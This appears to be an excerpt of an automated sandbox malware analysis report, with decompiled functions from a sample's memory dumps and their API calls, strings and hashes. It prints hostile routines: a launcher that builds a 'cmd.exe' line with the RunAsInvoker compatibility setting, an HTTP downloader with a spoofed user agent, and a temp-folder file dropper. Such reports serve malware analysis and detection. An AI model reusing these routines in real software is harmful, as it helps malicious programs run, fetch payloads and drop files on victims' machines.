                                              • TlsSetValue.KERNEL32(00000000), ref: 00406852
                                              • __init_pointers.LIBCMT ref: 0040685C
                                              • __calloc_crt.LIBCMT ref: 004068D1
                                              • GetCurrentThreadId.KERNEL32 ref: 00406901
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: AddressProc$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                              • API String ID: 630932248-3819984048
                                              • Opcode ID: 59697e22f0d555e3b7d3cb8a22637ef6e66e256eaa5b52333f5b32bc99484974
                                              • Instruction ID: 7c5ed862ad4e46ccbc4200316f1e50c4686e51c2e14fc2ae8d4e83c3db53f4cc
                                              • Opcode Fuzzy Hash: 59697e22f0d555e3b7d3cb8a22637ef6e66e256eaa5b52333f5b32bc99484974
                                              • Instruction Fuzzy Hash: 023166B19003129AD7107FB9BD05B863AA4ABC0724B12853BF821BB2F1DB399554CF7D
                                              C-Code - Quality: 82%
                                              			E00402F60(void* __ebx, intOrPtr __ecx, WCHAR* __edx, void* __eflags) {
                                              				void* __edi;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed int _t39;
                                              				intOrPtr* _t45;
                                              				void* _t52;
                                              				void* _t53;
                                              				void* _t56;
                                              				void* _t64;
                                              				intOrPtr* _t65;
                                              				void* _t68;
                                              				void* _t70;
                                              				signed int _t71;
                                              				intOrPtr _t82;
                                              				intOrPtr _t87;
                                              				void* _t88;
                                              				short* _t89;
                                              				void* _t92;
                                              				WCHAR* _t94;
                                              				void* _t95;
                                              				void* _t96;
                                              				void* _t97;
                                              				void* _t98;
                                              				intOrPtr _t100;
                                              				signed int _t101;
                                              				signed int _t104;
                                              				signed int _t105;
                                              				void* _t106;
                                              				signed int _t107;
                                              
                                              				_t68 = __ebx;
                                              				_t39 =  *0x413004; // 0x98fc836b
                                              				 *(_t104 + 0x628) = _t39 ^ _t104;
                                              				_t100 =  *((intOrPtr*)(_t104 + 0x634));
                                              				_push(_t88);
                                              				_t94 = __edx;
                                              				 *((intOrPtr*)(_t104 + 0x24)) = _t100;
                                              				 *((intOrPtr*)(_t104 + 0x20)) =  *((intOrPtr*)(_t104 + 0x638));
                                              				 *((intOrPtr*)(_t104 + 0x1c)) = __ecx;
                                              				 *((short*)(_t104 + 0x28)) = 0;
                                              				E00409280(_t88, _t104 + 0x22, 0, 0x206);
                                              				_t105 = _t104 + 0xc;
                                              				 *((char*)(_t105 + 0x1b)) = 0;
                                              				GetShortPathNameW(_t94, _t105 + 0x20, 0x104);
                                              				_t45 = _t105 + 0x1c;
                                              				_t70 = _t45 + 2;
                                              				do {
                                              					_t82 =  *_t45;
                                              					_t45 = _t45 + 2;
                                              				} while (_t82 != 0);
                                              				_t71 = 2;
                                              				_t95 = (_t45 - _t70 >> 1) + 1;
                                              				if(__ebx > 2) {
                                              					do {
                                              						_t65 =  *((intOrPtr*)(_t100 + _t71 * 4));
                                              						_t92 = _t65 + 2;
                                              						do {
                                              							_t87 =  *_t65;
                                              							_t65 = _t65 + 2;
                                              						} while (_t87 != 0);
                                              						_t71 = _t71 + 1;
                                              						_t95 = _t95 + (_t65 - _t92 >> 1) + 1;
                                              					} while (_t71 < _t68);
                                              				}
                                              				GetModuleFileNameW(0, _t105 + 0x228, 0x104);
                                              				GetShortPathNameW(_t105 + 0x22c, _t105 + 0x430, 0x104);
                                              				if( *((char*)(_t105 + 0x640)) == 0) {
                                              					_t96 = _t95 + 0x14;
                                              				} else {
                                              					_t96 = _t95 + 0x30;
                                              				}
                                              				_t89 = LocalAlloc(0, _t96 + _t96);
                                              				if(_t89 != 0) {
                                              					 *_t89 = 0;
                                              					_t52 = E00403926(_t105 + 0x1c, 0x104);
                                              					_t106 = _t105 + 8;
                                              					if( *((char*)(_t106 + 0x640)) == 0) {
                                              						_t53 = E0040360D(_t106 + 0x1c, L".msc");
                                              						_t106 = _t106 + 8;
                                              						if(_t53 != 0) {
                                              							E004036E5(_t53, _t89, _t96, L"cmd.exe /c \"start ");
                                              							 *((char*)( *((intOrPtr*)(_t106 + 0x1c)))) = 1;
                                              							goto L16;
                                              						}
                                              					} else {
                                              						E004036E5(_t52, _t89, _t96, L"cmd.exe /c \"set __COMPAT_LAYER=RunAsInvoker &&");
                                              						 *((char*)( *((intOrPtr*)(_t106 + 0x1c)))) = 1;
                                              						L16:
                                              						 *((char*)(_t106 + 0x1b)) = 1;
                                              						_t106 = _t106 + 0xc;
                                              					}
                                              					_t56 = E0040366B(E0040366B(_t106 + 0x1c, _t89, _t96, _t106 + 0x1c), _t89, _t96, 0x4118f0);
                                              					_t101 = 2;
                                              					_t107 = _t106 + 0x18;
                                              					if(_t68 > 2) {
                                              						do {
                                              							_t56 = E0040366B(E0040366B(_t56, _t89, _t96,  *((intOrPtr*)( *(_t107 + 0x18) + _t101 * 4))), _t89, _t96, 0x4118f0);
                                              							_t101 = _t101 + 1;
                                              							_t107 = _t107 + 0x18;
                                              						} while (_t101 < _t68);
                                              					}
                                              					if( *((char*)(_t107 + 0xf)) != 0) {
                                              						E0040366B(_t56, _t89, _t96, 0x4118f4);
                                              						_t107 = _t107 + 0xc;
                                              					}
                                              					 *((intOrPtr*)( *((intOrPtr*)(_t107 + 0x14)))) = _t89;
                                              					_pop(_t97);
                                              					E0040318A(0, _t68,  *(_t107 + 0x634) ^ _t107, _t97);
                                              					return 0;
                                              				} else {
                                              					_t24 = _t89 + 8; // 0x8
                                              					_t64 = _t24;
                                              					_pop(_t98);
                                              					E0040318A(_t64, _t68,  *(_t105 + 0x628) ^ _t105, _t98);
                                              					return _t64;
                                              				}
			}

                                              Instruction addresses for the decompiled listing above (one per source line, flattened here from the side column of the report):
                                              0x00402f60 0x00402f66 0x00402f6d 0x00402f7c 0x00402f84 0x00402f8a 0x00402f93 0x00402f97 0x00402f9b 0x00402f9f 0x00402fa6 0x00402fab 0x00402fb9 0x00402fbe 0x00402fc4 0x00402fc8 0x00402fd0 0x00402fd0 0x00402fd3 0x00402fd6 0x00402fdf 0x00402fe6 0x00402fe9 0x00402ff0 0x00402ff0 0x00402ff4 0x00402ff7 0x00402ff7 0x00402ffa 0x00402ffd 0x00403006 0x0040300b 0x0040300b 0x00402ff0 0x00403020 0x0040303b 0x00403049 0x00403050 0x0040304b 0x0040304b 0x0040304b 0x0040305f 0x00403063 0x0040308a 0x0040308f 0x00403094 0x0040309f 0x004030c0 0x004030c5 0x004030ca 0x004030d3 0x004030dc 0x00000000 0x004030dc 0x004030a1 0x004030a8 0x004030b1 0x004030df 0x004030df 0x004030e4 0x004030e4 0x004030fa 0x004030ff 0x00403104 0x00403109 0x00403110 0x00403126 0x0040312b 0x0040312e 0x00403131 0x00403110 0x0040313a 0x00403143 0x00403148 0x00403148 0x00403156 0x00403159 0x0040315f 0x0040316a 0x00403065 0x00403065 0x00403065 0x00403069 0x00403074 0x0040307f 0x0040307f

                                              APIs
                                              • _memset.LIBCMT ref: 00402FA6
                                              • GetShortPathNameW.KERNEL32 ref: 00402FBE
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403020
                                              • GetShortPathNameW.KERNEL32 ref: 0040303B
                                              • LocalAlloc.KERNEL32(00000000), ref: 00403059
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Name$PathShort$AllocFileLocalModule_memset
                                              • String ID: .msc$cmd.exe /c "set __COMPAT_LAYER=RunAsInvoker &&$cmd.exe /c "start
                                              • API String ID: 3786246004-2437571064
                                              • Opcode ID: 4fa69a20af8ed9328d554935d36f2ab083722ec717f1d2048d50260163dd52f2
                                              • Instruction ID: de00689b0eb6e5bdbbfd2616fea31aee9d38f1499e5edb8031d74eed1a826148
                                              • Opcode Fuzzy Hash: 4fa69a20af8ed9328d554935d36f2ab083722ec717f1d2048d50260163dd52f2
                                              • Instruction Fuzzy Hash: F4511671504301ABC320EF55CC46BAB7BE8AFD5309F04482EF549A32C1E7799648C7AB
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E02B53905(intOrPtr __ecx, WCHAR* __edx, WCHAR* _a4, short _a8) {
                                              				void _v8;
                                              				long _v12;
                                              				long _v16;
                                              				void _v20;
                                              				intOrPtr _v24;
                                              				long _v28;
                                              				void* _v32;
                                              				void* _v36;
                                              				WCHAR* _v40;
                                              				WCHAR* _v44;
                                              				void* _t29;
                                              				void* _t55;
                                              				void* _t59;
                                              				WCHAR* _t60;
                                              
                                              				_t60 = 0;
                                              				_v44 = L"text/*";
                                              				_v12 = 0;
                                              				_v24 = __ecx;
                                              				_v28 = 0;
                                              				_v8 = 0;
                                              				_v20 = 0;
                                              				_v16 = 0;
                                              				_v40 = 0;
                                              				_t29 = InternetOpenW(L"Mozilla / 5.0 (SymbianOS / 9.1; U; [en]; SymbianOS / 91 Series60 / 3.0) AppleWebkit / 413 (KHTML, like Gecko) Safari / 413", 0, 0, 0, 0);
                                              				_v36 = _t29;
                                              				if(_t29 != 0) {
                                              					_t55 = InternetConnectW(_t29, __edx, _a8, 0x2b542bc, 0x2b542bc, 3, 0, 0);
                                              					_v32 = _t55;
                                              					if(_t55 != 0) {
                                              						_t34 =  !=  ? 0x84803000 : 0x84003000;
                                              						_v8 =  !=  ? 0x84803000 : 0x84003000;
                                              						_t59 = HttpOpenRequestW(_t55, L"GET", _a4, L"HTTP/1.1", 0,  &_v44, 0x84003000, 0);
                                              						if(_t59 != 0) {
                                              							if(_v24 != 0) {
                                              								_v12 = 4;
                                              								InternetQueryOptionW(_t59, 0x1f,  &_v8,  &_v12);
                                              								_v8 = _v8 | 0x00000080;
                                              								InternetSetOptionW(_t59, 0x1f,  &_v8, 4);
                                              							}
                                              							_t60 = HttpSendRequestW(_t59, _t60, _t60, _t60, _t60);
                                              							if(_t60 != 0) {
                                              								_v16 = 4;
                                              								_t60 = HttpQueryInfoW(_t59, 0x20000013,  &_v20,  &_v16,  &_v28);
                                              								if(_t60 != 0) {
                                              									_t60 =  !=  ? 0 : _t60;
                                              								}
                                              							} else {
                                              								GetLastError();
                                              							}
                                              							InternetCloseHandle(_t59);
                                              						}
                                              						InternetCloseHandle(_v32);
                                              					}
                                              					InternetCloseHandle(_v36);
                                              				}
                                              				return _t60;
			}

                                              Instruction addresses for the decompiled listing above (one per source line, flattened here from the side column of the report):
                                              0x02b5390d 0x02b5390f 0x02b5391d 0x02b53927 0x02b5392a 0x02b5392d 0x02b53930 0x02b53933 0x02b53936 0x02b53939 0x02b5393f 0x02b53944 0x02b53966 0x02b53968 0x02b5396d 0x02b53980 0x02b53984 0x02b539a0 0x02b539a4 0x02b539ad 0x02b539b2 0x02b539c1 0x02b539c7 0x02b539d7 0x02b539d7 0x02b539e8 0x02b539ec 0x02b539f9 0x02b53a15 0x02b53a19 0x02b53a24 0x02b53a24 0x02b539ee 0x02b539ee 0x02b539ee 0x02b53a28 0x02b53a28 0x02b53a2d 0x02b53a2d 0x02b53a32 0x02b53a32 0x02b53a3c

                                              APIs
                                              • InternetOpenW.WININET(Mozilla / 5.0 (SymbianOS / 9.1; U; [en]; SymbianOS / 91 Series60 / 3.0) AppleWebkit / 413 (KHTML, like Gecko) Safari / 413,00000000,00000000,00000000,00000000), ref: 02B53939
                                              • InternetConnectW.WININET(00000000,?,?,02B542BC,02B542BC,00000003,00000000,00000000), ref: 02B5395A
                                              • HttpOpenRequestW.WININET(00000000,GET,?,HTTP/1.1,00000000,02B54624,84003000,00000000), ref: 02B5399A
                                              • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 02B539C1
                                              • InternetSetOptionW.WININET(00000000,0000001F,00000080,00000004), ref: 02B539D7
                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02B539E2
                                              • GetLastError.KERNEL32(?,?,02B542BC,02B542BC,00000003,00000000,00000000,?,?,00000000), ref: 02B539EE
                                              • HttpQueryInfoW.WININET(00000000,20000013,?,00000004,?), ref: 02B53A0F
                                              • InternetCloseHandle.WININET(00000000), ref: 02B53A28
                                              • InternetCloseHandle.WININET(?), ref: 02B53A2D
                                              • InternetCloseHandle.WININET(?), ref: 02B53A32
                                              Strings
                                              • text/*, xrefs: 02B5390F
                                              • HTTP/1.1, xrefs: 02B5398C
                                              • GET, xrefs: 02B53994
                                              • Mozilla / 5.0 (SymbianOS / 9.1; U; [en]; SymbianOS / 91 Series60 / 3.0) AppleWebkit / 413 (KHTML, like Gecko) Safari / 413, xrefs: 02B53920
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Internet$CloseHandleHttp$OpenOptionQueryRequest$ConnectErrorInfoLastSend
                                              • String ID: GET$HTTP/1.1$Mozilla / 5.0 (SymbianOS / 9.1; U; [en]; SymbianOS / 91 Series60 / 3.0) AppleWebkit / 413 (KHTML, like Gecko) Safari / 413$text/*
                                              • API String ID: 549917901-3682974978
                                              • Opcode ID: 1c2d5226e3a0a79d90000d2fdfc296e1e615a2324ca35ac5e79ab94bf20b8545
                                              • Instruction ID: 8b1cb4974245ab8e90440c2ac24a5659eddd1b59160cf91b14455d657b57d53e
                                              • Opcode Fuzzy Hash: 1c2d5226e3a0a79d90000d2fdfc296e1e615a2324ca35ac5e79ab94bf20b8545
                                              • Instruction Fuzzy Hash: 65310BB1D51229BBEB118F959C49BEFBEFCEF49694F00419AF905E6240D7708A409BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 42%
                                              			E0040AF20(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                              				char _v8;
                                              				intOrPtr _v12;
                                              				char _v16;
                                              				char _v20;
                                              				char _v24;
                                              				signed char _v28;
                                              				char _v36;
                                              				void* __ebx;
                                              				void* __edi;
                                              				intOrPtr* _t31;
                                              				intOrPtr* _t34;
                                              				intOrPtr _t35;
                                              				intOrPtr* _t37;
                                              				void* _t41;
                                              				void* _t43;
                                              				intOrPtr _t48;
                                              				intOrPtr _t50;
                                              				void* _t54;
                                              				intOrPtr _t56;
                                              				intOrPtr _t61;
                                              				void* _t67;
                                              				void* _t71;
                                              				void* _t74;
                                              				intOrPtr* _t75;
                                              				struct HINSTANCE__* _t76;
                                              				intOrPtr* _t77;
                                              				intOrPtr* _t79;
                                              
                                              				_t74 = __edx;
                                              				_v12 = E0040643A();
                                              				_v8 = 0;
                                              				_v16 = 0;
                                              				_v20 = 0;
                                              				if( *0x4149b8 != 0) {
                                              					L8:
                                              					_t29 =  *0x4149c4;
                                              					_t61 = _v12;
                                              					if( *0x4149c4 == _t61 ||  *0x4149c8 == _t61) {
                                              						L20:
                                              						_t30 =  *0x4149bc;
                                              						if( *0x4149bc != _v12) {
                                              							_t34 = E00406443(_t30);
                                              							if(_t34 != 0) {
                                              								_t35 =  *_t34();
                                              								_v8 = _t35;
                                              								if(_t35 != 0) {
                                              									_t36 =  *0x4149c0;
                                              									if( *0x4149c0 != _v12) {
                                              										_t37 = E00406443(_t36);
                                              										if(_t37 != 0) {
                                              											_v8 =  *_t37(_v8);
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              						goto L26;
                                              					} else {
                                              						_t77 = E00406443(_t29);
                                              						_t75 = E00406443( *0x4149c8);
                                              						if(_t77 == 0 || _t75 == 0) {
                                              							goto L20;
                                              						} else {
                                              							_t41 =  *_t77();
                                              							if(_t41 == 0) {
                                              								L15:
                                              								_t43 = E00406AA9( &_v20);
                                              								_pop(_t67);
                                              								if(_t43 != 0) {
                                              									_push(0);
                                              									_push(0);
                                              									_push(0);
                                              									_push(0);
                                              									_push(0);
                                              									E00405700(0, _t67, _t74, _t75);
                                              								}
                                              								if(_v20 < 4) {
                                              									_a12 = _a12 | 0x00040000;
                                              								} else {
                                              									_a12 = _a12 | 0x00200000;
                                              								}
                                              								L26:
                                              								_t31 = E00406443( *0x4149b8);
                                              								if(_t31 == 0) {
                                              									L28:
                                              									return 0;
                                              								}
                                              								return  *_t31(_v8, _a4, _a8, _a12);
                                              							}
                                              							_push( &_v24);
                                              							_push(0xc);
                                              							_push( &_v36);
                                              							_push(1);
                                              							_push(_t41);
                                              							if( *_t75() == 0 || (_v28 & 0x00000001) == 0) {
                                              								goto L15;
                                              							} else {
                                              								goto L20;
                                              							}
                                              						}
                                              					}
                                              				}
                                              				_t76 = LoadLibraryA("USER32.DLL");
                                              				if(_t76 == 0 || GetProcAddress(_t76, "MessageBoxA") == 0) {
                                              					goto L28;
                                              				} else {
                                              					_t48 = E004063CC(_t47);
                                              					 *_t79 = "GetActiveWindow";
                                              					 *0x4149b8 = _t48;
                                              					_t50 = E004063CC(GetProcAddress(??, ??));
                                              					 *_t79 = "GetLastActivePopup";
                                              					 *0x4149bc = _t50;
                                              					 *0x4149c0 = E004063CC(GetProcAddress(_t76, _t76));
                                              					_t54 = E00406A72( &_v16,  &_v16);
                                              					_pop(_t71);
                                              					if(_t54 != 0) {
                                              						_push(0);
                                              						_push(0);
                                              						_push(0);
                                              						_push(0);
                                              						_push(0);
                                              						E00405700(0, _t71, _t74, _t76);
                                              						_t79 = _t79 + 0x14;
                                              					}
                                              					if(_v16 == 2) {
                                              						_t56 = E004063CC(GetProcAddress(_t76, "GetUserObjectInformationA"));
                                              						 *0x4149c8 = _t56;
                                              						if(_t56 != 0) {
                                              							 *0x4149c4 = E004063CC(GetProcAddress(_t76, "GetProcessWindowStation"));
                                              						}
                                              					}
                                              					goto L8;
                                              				}
                                              			}

                                              APIs
                                              • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 0040AF4D
                                              • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040AF69
                                                • Part of subcall function 004063CC: TlsGetValue.KERNEL32(00000000,00406441,00000000,0040AF2E,00000000,00000000,00000314,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 004063D9
                                                • Part of subcall function 004063CC: TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 004063F0
                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AF86
                                                • Part of subcall function 004063CC: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 00406405
                                                • Part of subcall function 004063CC: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00406420
                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AF9B
                                              • __invoke_watson.LIBCMT ref: 0040AFBC
                                                • Part of subcall function 00405700: _memset.LIBCMT ref: 0040578C
                                                • Part of subcall function 00405700: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 004057AA
                                                • Part of subcall function 00405700: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 004057B4
                                                • Part of subcall function 00405700: UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 004057BE
                                                • Part of subcall function 00405700: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 004057D9
                                                • Part of subcall function 00405700: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 004057E0
                                                • Part of subcall function 00406443: TlsGetValue.KERNEL32(?,00406ED3,004035FD,?,?,00401E38,00000000,?,?), ref: 00406450
                                                • Part of subcall function 00406443: TlsGetValue.KERNEL32(FFFFFFFF,?,00401E38,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00406467
                                                • Part of subcall function 00406443: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00401E38,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0040647C
                                                • Part of subcall function 00406443: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00406497
                                              • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 0040AFD0
                                              • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0040AFE8
                                              • __invoke_watson.LIBCMT ref: 0040B05B
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
                                              • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                              • API String ID: 2940365033-232180764
                                              • Opcode ID: 9dc9d6c9699a12b4101e6e517c17312217e972a6e614ab9b554892a8391cc6b4
                                              • Instruction ID: 1c028cbe132dd73ef92918e8f78929fa75bbb1dd901022f9e38424cc5d2cf97e
                                              • Opcode Fuzzy Hash: 9dc9d6c9699a12b4101e6e517c17312217e972a6e614ab9b554892a8391cc6b4
                                              • Instruction Fuzzy Hash: E94164B1D05205AACF20AFB59C85D6FBBA8EE44314F11493FE811F22D1DB3D89548B9E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 91%
                                              			E02B52AC6(void* __ebx, WCHAR* __ecx, void* __edx, void* __edi, void* __esi, long _a4) {
                                              				signed int _v8;
                                              				short _v528;
                                              				short _v1048;
                                              				short _v1568;
                                              				long _v1572;
                                              				void* _v1576;
                                              				WCHAR* _v1580;
                                              				signed int _t38;
                                              				long _t83;
                                              				WCHAR* _t84;
                                              				void* _t96;
                                              				void* _t97;
                                              				void* _t101;
                                              				void* _t106;
                                              				signed int _t111;
                                              
                                              				_t38 =  *0x2b56004; // 0xbb40e64e
                                              				_v8 = _t38 ^ _t111;
                                              				_v1576 = __edx;
                                              				_v1580 = __ecx;
                                              				if(GetTempPathW(0x104,  &_v1568) != 0) {
                                              					_t96 = 8;
                                              					E02B52A57( &_v528, _t96);
                                              					PathAppendW( &_v1568,  &_v528);
                                              					do {
                                              						_t97 = 0xa;
                                              						_v528 = 0;
                                              						_v1048 = 0;
                                              						E02B52A57( &_v528, _t97);
                                              						E02B52C9C( &_v1048,  &_v1568);
                                              						StrCatW( &_v1048,  &_v528);
                                              					} while (PathFileExistsW( &_v1048) != 0);
                                              					E02B52C9C( &_v1568,  &_v1048);
                                              					CreateDirectoryW( &_v1568, 0);
                                              					if(PathFileExistsW( &_v1568) != 0) {
                                              						_v528 = 0;
                                              						E02B52C9C( &_v528,  &_v1568);
                                              						_t101 = 6;
                                              						E02B52A57( &_v1048, _t101);
                                              						PathAppendW( &_v528,  &_v1048);
                                              						DeleteFileW( &_v528);
                                              						_t106 = CreateFileW( &_v528, 0x10000000, 0, 0, 2, 0, 0);
                                              						if(_t106 == 0xffffffff) {
                                              							goto L8;
                                              						} else {
                                              							_t83 = _a4;
                                              							_v1572 = 0;
                                              							if(WriteFile(_t106, _v1576, _t83,  &_v1572, 0) == 0 || _v1572 != _t83) {
                                              								CloseHandle(_t106);
                                              								goto L8;
                                              							} else {
                                              								__imp__GetLongPathNameW( &_v528,  &_v1048, 0x104);
                                              								_t84 = _v1580;
                                              								E02B52C9C(_t84,  &_v1048);
                                              								if(PathFileExistsW(_t84) != 0) {
                                              								}
                                              								CloseHandle(_t106);
                                              							}
                                              						}
                                              					}
                                              				}
                                              				return E02B53C33(_v8 ^ _t111);
                                              			}

                                              APIs
                                              • GetTempPathW.KERNEL32(00000104,?), ref: 02B52AF1
                                              • PathAppendW.SHLWAPI(?,?), ref: 02B52B23
                                              • StrCatW.SHLWAPI(?,?), ref: 02B52B68
                                              • PathFileExistsW.SHLWAPI(?), ref: 02B52B75
                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000), ref: 02B52B97
                                              • PathFileExistsW.SHLWAPI(?), ref: 02B52BA4
                                              • PathAppendW.SHLWAPI(?,?), ref: 02B52BE4
                                              • DeleteFileW.KERNEL32(?), ref: 02B52BED
                                              • CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,00000000,00000000), ref: 02B52C05
                                              • WriteFile.KERNEL32(00000000,?,00001C00,?,00000000), ref: 02B52C2B
                                              • CloseHandle.KERNEL32(00000000), ref: 02B52C3E
                                              • GetLongPathNameW.KERNEL32(?,?,00000104), ref: 02B52C5B
                                              • PathFileExistsW.SHLWAPI(?), ref: 02B52C75
                                              • CloseHandle.KERNEL32(00000000), ref: 02B52C83
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Path$File$Exists$AppendCloseCreateHandle$DeleteDirectoryLongNameTempWrite
                                              • String ID:
                                              • API String ID: 706663521-0
                                              • Opcode ID: 3e4aec782e86c1b90e37532d9cef308f4dacd9b8f14d326197f801334e49dca3
                                              • Instruction ID: 0aabc731e3607d2a8cc736d9ac6f73d4216c9389469abae017c0bb598ebd4d65
                                              • Opcode Fuzzy Hash: 3e4aec782e86c1b90e37532d9cef308f4dacd9b8f14d326197f801334e49dca3
                                              • Instruction Fuzzy Hash: 05514EB190132D9ACB20DF60DC88BDEB77DEF88350F1445E5A909EB141EA309A95CF64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 82%
                                              			E00401310(struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
                                              				signed int _v4;
                                              				short _v524;
                                              				intOrPtr _v528;
                                              				int _v532;
                                              				void* _v536;
                                              				void* _v540;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed int _t15;
                                              				void* _t18;
                                              				struct HBRUSH__* _t29;
                                              				void* _t30;
                                              				void* _t32;
                                              				void* _t34;
                                              				intOrPtr _t42;
                                              				void* _t44;
                                              				void* _t50;
                                              				struct HWND__* _t54;
                                              				void* _t55;
                                              				signed int _t59;
                                              
                                              				_t59 =  &_v540;
                                              				_t15 =  *0x413004; // 0x98fc836b
                                              				_v4 = _t15 ^ _t59;
                                              				_t18 = _a8 - 0x110;
                                              				_t42 = _a16;
                                              				_t54 = _a4;
                                              				if(_t18 == 0) {
                                              					_t50 = E00401220();
                                              					_v540 = _t50;
                                              					_v536 =  &_v540;
                                              					_v532 = 0;
                                              					_v528 = E004012C0;
                                              					E00403227( &_v540,  &_v524, L"%s License Agreement", _t42);
                                              					SetWindowTextW(_t54,  &_v524);
                                              					SendMessageW(GetDlgItem(_t54, 0x1f4), 0x435, 0, 0x100000);
                                              					SendMessageW(GetDlgItem(_t54, 0x1f4), 0x449, 2,  &_v536);
                                              					_push(_t50);
                                              					E00403199( &_v524, _t54, __eflags);
                                              					_t59 = _t59 + 0x10;
                                              					goto L13;
                                              				} else {
                                              					_t30 = _t18 - 1;
                                              					if(_t30 == 0) {
                                              						_t32 = (_a12 & 0x0000ffff) - 1;
                                              						__eflags = _t32;
                                              						if(_t32 == 0) {
                                              							EndDialog(_t54, 1);
                                              							goto L13;
                                              						} else {
                                              							_t34 = _t32 - 1;
                                              							__eflags = _t34;
                                              							if(_t34 == 0) {
                                              								EndDialog(_t54, 0);
                                              								goto L13;
                                              							} else {
                                              								__eflags = _t34 - 0x1f3;
                                              								if(__eflags == 0) {
                                              									E00401000(GetDlgItem(_t54, 0x1f4), __eflags);
                                              									L13:
                                              									_t29 = 1;
                                              								} else {
                                              									goto L8;
                                              								}
                                              							}
                                              						}
                                              					} else {
                                              						if(_t30 != 0x27 || _t42 != GetDlgItem(_t54, 0x1f4)) {
                                              							L8:
                                              							_t29 = 0;
                                              						} else {
                                              							_t29 = GetSysColorBrush(5);
                                              						}
                                              					}
                                              				}
                                              				_pop(_t55);
                                              				_pop(_t44);
                                              				E0040318A(_t29, _t44, _v4 ^ _t59, _t55);
                                              				return _t29;
                                              			}

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
